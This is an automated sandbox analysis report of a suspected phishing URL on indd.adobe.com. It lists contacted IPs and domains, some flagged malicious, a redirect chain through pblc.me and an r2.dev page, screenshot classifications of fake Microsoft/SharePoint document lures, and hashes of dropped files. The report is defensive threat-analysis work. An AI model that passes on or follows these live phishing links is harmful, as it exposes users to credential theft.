                                                                                                                                                                                                        https://aws-amplify.github.io/docs/js/authentication#amplify-project-setupchromecache_773.2.dr, chromecache_443.2.dr, chromecache_840.2.dr, chromecache_478.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        http://github.com/garycourt/murmurhash-jschromecache_642.2.dr, chromecache_670.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://use.typekit.netchromecache_434.2.dr, chromecache_683.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://use.typekit.net/af/c0160f/00000000000000007735dac8/30/l?primer=7cdcb44be4a7db8877ffa5c0007b8chromecache_446.2.drfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://sketch.comchromecache_318.2.dr, chromecache_569.2.drfalse
                                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://conversation.api.drift.comchromecache_511.2.dr, chromecache_571.2.drfalse
                                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        https://td.doubleclick.net/td/bjschromecache_505.2.drfalse
                                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                        172.217.16.134
                                                                                                                                                                                                        ad.doubleclick.netUnited States
                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                        18.239.94.93
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        216.58.212.142
                                                                                                                                                                                                        analytics.google.comUnited States
                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                        18.239.94.98
                                                                                                                                                                                                        js.intercomcdn.comUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        13.107.246.45
                                                                                                                                                                                                        s-part-0017.t-0009.t-msedge.netUnited States
                                                                                                                                                                                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                        147.154.52.189
                                                                                                                                                                                                        p04e.t.eloqua.comUnited States
                                                                                                                                                                                                        31898ORACLE-BMC-31898USfalse
                                                                                                                                                                                                        142.250.185.100
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                        142.250.185.226
                                                                                                                                                                                                        googleads.g.doubleclick.netUnited States
                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                        18.239.83.81
                                                                                                                                                                                                        tr-rc.lfeeder.comUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        104.18.34.178
                                                                                                                                                                                                        d-ipv6.mmapiws.comUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        34.237.73.95
                                                                                                                                                                                                        nexus-websocket-a.intercom.ioUnited States
                                                                                                                                                                                                        14618AMAZON-AESUSfalse
                                                                                                                                                                                                        104.17.249.203
                                                                                                                                                                                                        unpkg.comUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        35.190.80.1
                                                                                                                                                                                                        a.nel.cloudflare.comUnited States
                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                        157.240.252.13
                                                                                                                                                                                                        scontent.xx.fbcdn.netUnited States
                                                                                                                                                                                                        32934FACEBOOKUSfalse
                                                                                                                                                                                                        172.67.187.13
                                                                                                                                                                                                        quantumspirel.ruUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUStrue
                                                                                                                                                                                                        3.160.212.127
                                                                                                                                                                                                        platform-api.sharethis.comUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        18.239.83.5
                                                                                                                                                                                                        dja7ygzgr04yk.cloudfront.netUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        5.9.73.80
                                                                                                                                                                                                        www.woopra.comGermany
                                                                                                                                                                                                        24940HETZNER-ASDEfalse
                                                                                                                                                                                                        18.239.94.121
                                                                                                                                                                                                        static-cdn.hotjar.comUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        104.18.2.35
                                                                                                                                                                                                        pub-e1c6f3d85d51402790227684363ac52c.r2.devUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        3.161.127.167
                                                                                                                                                                                                        d3e54v103j8qbb.cloudfront.netUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        151.101.192.217
                                                                                                                                                                                                        vimeo.map.fastly.netUnited States
                                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                                        172.67.73.236
                                                                                                                                                                                                        c.lytics.ioUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUStrue
                                                                                                                                                                                                        142.250.185.198
                                                                                                                                                                                                        dart.l.doubleclick.netUnited States
                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                        99.80.122.221
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        3.165.190.57
                                                                                                                                                                                                        dna8twue3dlxq.cloudfront.netUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        18.239.83.71
                                                                                                                                                                                                        prod.adobeccstatic.comUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        239.255.255.250
                                                                                                                                                                                                        unknownReserved
                                                                                                                                                                                                        unknownunknownfalse
                                                                                                                                                                                                        18.245.86.14
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        172.67.129.239
                                                                                                                                                                                                        pblc.meUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        104.26.8.234
                                                                                                                                                                                                        publicate.itUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        142.250.186.130
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                        54.77.85.140
                                                                                                                                                                                                        dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        64.233.184.155
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                        157.240.0.6
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        32934FACEBOOKUSfalse
                                                                                                                                                                                                        13.224.103.7
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        18.239.83.60
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        18.239.83.61
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        13.227.219.60
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        18.239.83.65
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        104.17.24.14
                                                                                                                                                                                                        cdnjs.cloudflare.comUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        5.9.57.79
                                                                                                                                                                                                        unknownGermany
                                                                                                                                                                                                        24940HETZNER-ASDEfalse
                                                                                                                                                                                                        172.64.153.78
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        151.101.2.208
                                                                                                                                                                                                        dualstack.com.imgix.map.fastly.netUnited States
                                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                                        35.244.240.189
                                                                                                                                                                                                        seoab.ioUnited States
                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                        157.240.253.1
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        32934FACEBOOKUSfalse
                                                                                                                                                                                                        142.250.186.66
                                                                                                                                                                                                        td.doubleclick.netUnited States
                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                        3.233.158.24
                                                                                                                                                                                                        browser-intake-datadoghq.comUnited States
                                                                                                                                                                                                        14618AMAZON-AESUSfalse
                                                                                                                                                                                                        216.239.34.181
                                                                                                                                                                                                        analytics-alv.google.comUnited States
                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                        104.17.248.203
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        18.66.122.5
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                        13.32.27.18
                                                                                                                                                                                                        d2vtt4oircqqvk.cloudfront.netUnited States
                                                                                                                                                                                                        7018ATT-INTERNET4USfalse
                                                                                                                                                                                                        18.66.102.126
                                                                                                                                                                                                        d28mvs9821idoy.cloudfront.netUnited States
                                                                                                                                                                                                        3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                        18.158.205.16
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        13.227.219.87
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        104.18.32.137
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        162.159.134.22
                                                                                                                                                                                                        device.maxmind.comUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        151.101.66.137
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                                        142.250.184.228
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                        3.217.222.30
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        14618AMAZON-AESUSfalse
                                                                                                                                                                                                        142.250.185.66
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                        76.76.21.142
                                                                                                                                                                                                        cname.vercel-dns.comUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        18.239.49.193
                                                                                                                                                                                                        www.datadoghq-browser-agent.comUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        104.18.95.41
                                                                                                                                                                                                        challenges.cloudflare.comUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        172.64.155.119
                                                                                                                                                                                                        geolocation.onetrust.comUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        188.114.97.3
                                                                                                                                                                                                        img.pblc.itEuropean Union
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        13.227.219.71
                                                                                                                                                                                                        script.hotjar.comUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        104.16.141.209
                                                                                                                                                                                                        js.hs-scripts.comUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        151.101.194.208
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                                        54.228.154.232
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        216.58.206.70
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                        74.125.133.156
                                                                                                                                                                                                        stats.g.doubleclick.netUnited States
                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                        104.18.94.41
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        52.87.4.7
                                                                                                                                                                                                        api-iam.intercom.ioUnited States
                                                                                                                                                                                                        14618AMAZON-AESUSfalse
                                                                                                                                                                                                        162.247.243.30
                                                                                                                                                                                                        fastly-tls12-bam-cell.nr-data.netUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        172.67.72.12
                                                                                                                                                                                                        www.ipqualityscore.comUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        52.5.177.15
                                                                                                                                                                                                        q.quora.comUnited States
                                                                                                                                                                                                        14618AMAZON-AESUSfalse
                                                                                                                                                                                                        52.22.68.130
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        14618AMAZON-AESUSfalse
                                                                                                                                                                                                        150.171.28.10
                                                                                                                                                                                                        ax-0001.ax-msedge.netUnited States
                                                                                                                                                                                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                        162.247.243.39
                                                                                                                                                                                                        js-agent.newrelic.comUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        52.222.232.47
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        18.245.86.73
                                                                                                                                                                                                        dl7g9llrghqi1.cloudfront.netUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        104.26.3.22
                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        142.250.185.132
                                                                                                                                                                                                        www.google.comUnited States
                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                        18.153.4.44
                                                                                                                                                                                                        reveal.clearbit.comUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        104.21.84.57
                                                                                                                                                                                                        assets.getalvis.comUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        151.101.2.137
                                                                                                                                                                                                        code.jquery.comUnited States
                                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                                        35.201.112.186
                                                                                                                                                                                                        edge.fullstory.comUnited States
                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                        142.250.185.130
                                                                                                                                                                                                        adservice.google.comUnited States
                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                        104.18.86.42
                                                                                                                                                                                                        cdn.cookielaw.orgUnited States
                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                        13.227.219.13
                                                                                                                                                                                                        reviews.capterra.comUnited States
                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                        IP
                                                                                                                                                                                                        192.168.2.5
                                                                                                                                                                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                                        Analysis ID:1501906
                                                                                                                                                                                                        Start date and time:2024-08-30 18:14:35 +02:00
                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                        Overall analysis duration:0h 4m 46s
                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                        Cookbook file name:browseurl.jbs
                                                                                                                                                                                                        Sample URL:https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1
                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                        Number of analysed new started processes analysed:9
                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                        Classification:mal88.phis.win@27/839@278/92
                                                                                                                                                                                                        EGA Information:Failed
                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                        • Number of executed functions: 0
                                                                                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                        • Browse: https://pblc.me/pub/40f029dddc28e3
                                                                                                                                                                                                        • Browse: https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874876473768.html
                                                                                                                                                                                                        • Browse: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate
                                                                                                                                                                                                        • Browse: https://www.capterra.com/p/145471/Publicate/
                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 108.177.15.84, 142.250.186.78, 142.250.186.35, 142.250.185.131, 143.204.215.125, 143.204.215.109, 143.204.215.11, 143.204.215.37, 74.125.206.84, 142.250.185.206, 34.104.35.123, 2.19.126.198, 2.19.126.206, 18.239.69.62, 18.239.69.100, 18.239.69.21, 18.239.69.42, 2.19.126.211, 2.19.126.219, 107.22.247.231, 18.207.85.246, 54.144.73.197, 34.193.227.236, 18.238.243.74, 18.238.243.90, 18.238.243.89, 18.238.243.77, 93.184.221.240, 192.229.221.95, 20.3.187.198, 52.165.164.15, 142.250.185.106, 172.217.16.195, 142.250.186.106, 142.250.184.202, 142.250.74.206, 151.101.1.91, 151.101.65.91, 151.101.129.91, 151.101.193.91, 142.250.186.136, 142.250.186.110, 88.221.110.227, 88.221.110.136, 13.107.42.14, 172.217.18.104, 20.114.189.70, 13.74.129.1, 13.107.21.237, 204.79.197.237, 52.231.230.148, 172.217.16.131, 104.18.40.158, 172.64.147.98, 142.250.181.234, 216.58.206.42, 142.250.186.170, 142.250.185.74, 142.250.184.234, 172.217.16.138, 172.217.18.106, 142.250.185.170, 142.250.185.202,
                                                                                                                                                                                                        • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                        • VT rate limit hit for: https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1
                                                                                                                                                                                                        No simulations
                                                                                                                                                                                                        InputOutput
                                                                                                                                                                                                        URL: https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1 Model: jbxai
                                                                                                                                                                                                        {
                                                                                                                                                                                                        "brand":["Sharepoint Doc"],
                                                                                                                                                                                                        "contains_trigger_text":false,
                                                                                                                                                                                                        "prominent_button_name":"unknown",
                                                                                                                                                                                                        "text_input_field_labels":["unknown"],
                                                                                                                                                                                                        "pdf_icon_visible":false,
                                                                                                                                                                                                        "has_visible_captcha":false,
                                                                                                                                                                                                        "has_urgent_text":false,
                                                                                                                                                                                                        "has_visible_qrcode":false}
                                                                                                                                                                                                        URL: https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1 Model: jbxai
                                                                                                                                                                                                        {
                                                                                                                                                                                                        "brand":["Sharepoint"],
                                                                                                                                                                                                        "contains_trigger_text":false,
                                                                                                                                                                                                        "prominent_button_name":"unknown",
                                                                                                                                                                                                        "text_input_field_labels":["unknown"],
                                                                                                                                                                                                        "pdf_icon_visible":false,
                                                                                                                                                                                                        "has_visible_captcha":false,
                                                                                                                                                                                                        "has_urgent_text":false,
                                                                                                                                                                                                        "has_visible_qrcode":false}
                                                                                                                                                                                                        URL: https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1 Model: jbxai
                                                                                                                                                                                                        {
                                                                                                                                                                                                        "brand":["Microsoft"],
                                                                                                                                                                                                        "contains_trigger_text":true,
                                                                                                                                                                                                        "prominent_button_name":"Click to Access Document",
                                                                                                                                                                                                        "text_input_field_labels":["unknown"],
                                                                                                                                                                                                        "pdf_icon_visible":true,
                                                                                                                                                                                                        "has_visible_captcha":false,
                                                                                                                                                                                                        "has_urgent_text":false,
                                                                                                                                                                                                        "has_visible_qrcode":false}
                                                                                                                                                                                                        URL: https://pblc.me/pub/40f029dddc28e3 Model: jbxai
                                                                                                                                                                                                        {
                                                                                                                                                                                                        "brand":["PDF"],
                                                                                                                                                                                                        "contains_trigger_text":true,
                                                                                                                                                                                                        "prominent_button_name":"View Your Statement",
                                                                                                                                                                                                        "text_input_field_labels":["unknown"],
                                                                                                                                                                                                        "pdf_icon_visible":true,
                                                                                                                                                                                                        "has_visible_captcha":false,
                                                                                                                                                                                                        "has_urgent_text":false,
                                                                                                                                                                                                        "has_visible_qrcode":false}
                                                                                                                                                                                                        URL: https://publicate.it/?utm_source=publicate_user_exported_emails&utm_medium=referral&utm_campaign=powered_by_publicate Model: jbxai
                                                                                                                                                                                                        {
                                                                                                                                                                                                        "brand":["publlcate"],
                                                                                                                                                                                                        "contains_trigger_text":false,
                                                                                                                                                                                                        "prominent_button_name":"Try It Free",
                                                                                                                                                                                                        "text_input_field_labels":["unknown"],
                                                                                                                                                                                                        "pdf_icon_visible":false,
                                                                                                                                                                                                        "has_visible_captcha":false,
                                                                                                                                                                                                        "has_urgent_text":false,
                                                                                                                                                                                                        "has_visible_qrcode":false}
                                                                                                                                                                                                        URL: https://www.capterra.com/p/145471/Publicate/ Model: jbxai
                                                                                                                                                                                                        {
                                                                                                                                                                                                        "brand":["Capterra"],
                                                                                                                                                                                                        "contains_trigger_text":false,
                                                                                                                                                                                                        "prominent_button_name":"SIGN UP",
                                                                                                                                                                                                        "text_input_field_labels":["unknown"],
                                                                                                                                                                                                        "pdf_icon_visible":false,
                                                                                                                                                                                                        "has_visible_captcha":false,
                                                                                                                                                                                                        "has_urgent_text":false,
                                                                                                                                                                                                        "has_visible_qrcode":false}
                                                                                                                                                                                                        URL: https://www.capterra.com/p/145471/Publicate/ Model: jbxai
                                                                                                                                                                                                        {
                                                                                                                                                                                                        "brand":["Capterra"],
                                                                                                                                                                                                        "contains_trigger_text":false,
                                                                                                                                                                                                        "prominent_button_name":"unknown",
                                                                                                                                                                                                        "text_input_field_labels":["unknown"],
                                                                                                                                                                                                        "pdf_icon_visible":false,
                                                                                                                                                                                                        "has_visible_captcha":false,
                                                                                                                                                                                                        "has_urgent_text":false,
                                                                                                                                                                                                        "has_visible_qrcode":false}
                                                                                                                                                                                                        URL: https://www.capterra.com/p/145471/Publicate/ Model: jbxai
                                                                                                                                                                                                        {
                                                                                                                                                                                                        "brand":["capterra"],
                                                                                                                                                                                                        "contains_trigger_text":false,
                                                                                                                                                                                                        "prominent_button_name":"get price",
                                                                                                                                                                                                        "text_input_field_labels":["unknown"],
                                                                                                                                                                                                        "pdf_icon_visible":false,
                                                                                                                                                                                                        "has_visible_captcha":false,
                                                                                                                                                                                                        "has_urgent_text":false,
                                                                                                                                                                                                        "has_visible_qrcode":false}
                                                                                                                                                                                                        URL: https://reviews.capterra.com/search/ Model: jbxai
                                                                                                                                                                                                        {
                                                                                                                                                                                                        "brand":["Capterra",
                                                                                                                                                                                                        "QuickBooks Enterprise",
                                                                                                                                                                                                        "Salesforce Sales Cloud",
                                                                                                                                                                                                        "Google Workspace"],
                                                                                                                                                                                                        "contains_trigger_text":false,
                                                                                                                                                                                                        "prominent_button_name":"unknown",
                                                                                                                                                                                                        "text_input_field_labels":["Search for a product you'd like to review",
                                                                                                                                                                                                        "Search for software you use",
                                                                                                                                                                                                        "Write a really helpful review. It's all in the details!"],
                                                                                                                                                                                                        "pdf_icon_visible":false,
                                                                                                                                                                                                        "has_visible_captcha":false,
                                                                                                                                                                                                        "has_urgent_text":false,
                                                                                                                                                                                                        "has_visible_qrcode":false}
                                                                                                                                                                                                        No context
                                                                                                                                                                                                        No context
                                                                                                                                                                                                        No context
                                                                                                                                                                                                        No context
                                                                                                                                                                                                        No context
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Aug 30 15:15:33 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2677
                                                                                                                                                                                                        Entropy (8bit):3.9804099486274924
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:8TynwdDTr7QHKidAKZdA19ehwiZUklqehHy+3:8unATdAy
                                                                                                                                                                                                        MD5:9F2DA9A088B6E5D1173D8FFBC2502B8E
                                                                                                                                                                                                        SHA1:DC3BDBAA38996925E98AE38338728134B80B604C
                                                                                                                                                                                                        SHA-256:C0BB3FADEBDCA9BA6FF3247FDA495187D61459B817F78FBC77832175C6D89DDA
                                                                                                                                                                                                        SHA-512:467366E8716A8AE4AE2736EDF2D545BCB53544B726A0D9F856DF8BE5CDAF2778C52C0CBB96F1AEB398CCE6DC65EBE193D25148A82621AFED40D047A34221C2D6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,.....jo.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........N(:O.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Aug 30 15:15:33 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2679
                                                                                                                                                                                                        Entropy (8bit):3.996438055089583
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:8mnwdDTr7QHKidAKZdA1weh/iZUkAQkqehwy+2:8mnATX9QFy
                                                                                                                                                                                                        MD5:FFD93C3897641F54BB16A8A329A2CA6D
                                                                                                                                                                                                        SHA1:1CE70D663168C70A09E6E14238F1094854A50144
                                                                                                                                                                                                        SHA-256:8B26D2C9B3B9A7337645A862FDC2F443EF056318C9650112490B00AEA9D52BC0
                                                                                                                                                                                                        SHA-512:94FBBD64812E582CF606C81367543534744A5F06C7BB09670D03E258858569EABCE0C7A4444E76E20B9687C535A8BF4205724A54531BB4E312364F6945E83F85
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
